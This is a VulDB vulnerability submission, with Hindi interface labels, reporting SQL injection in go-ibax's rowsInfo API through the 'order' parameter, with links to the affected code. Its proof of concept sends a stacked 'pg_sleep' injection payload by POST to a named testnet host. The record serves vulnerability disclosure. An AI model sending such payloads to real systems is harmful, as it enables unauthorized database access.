जमा करें #50343: SQL injection vulnerability in go-ibax via order parameterजानकारी

शीर्षक	SQL injection vulnerability in go-ibax via order parameter
विवरण	SQL Injection vulnerability in /packages/api/database.go of go-ibax via order parameter . This issue affects versions starting from commits on Jul 18, 2020. file: https://github.com/IBAX-io/go-ibax/blob/6bac7462801b5e6da47f1231681bb1516a7dd4bb/packages/api/database.go#L187 https://github.com/IBAX-io/go-ibax/blob/6bac7462801b5e6da47f1231681bb1516a7dd4bb/packages/api/database.go#L189 commits: https://github.com/IBAX-io/go-ibax/commit/ac760982dc31edc904c160c2e5707a28798646e2#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR172 https://github.com/IBAX-io/go-ibax/commit/ac760982dc31edc904c160c2e5707a28798646e2#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174 POC: Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo Request Method: POST PostData: ① order=1%3b+select+pg_sleep(10)--&table_name=pg_user&limit=1&page=1 ② with where parameter : order=1%3b+select+pg_sleep(10)--&table_name=pg_user&where=1=1&limit=1&page=1
स्रोत	⚠️ https://github.com/IBAX-io/go-ibax/issues/2062
उपयोगकर्ता	Tomy (UID 34751)
सबमिशन	01/11/2022 12:40 PM (4 साल पहले)
संयम	01/11/2022 04:43 PM (4 hours later)
स्थिति	स्वीकृत
VulDB प्रविष्टि	212637 [IBAX go-ibax /api/v2/open/rowsInfo order SQL इंजेक्शन]
अंक	20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!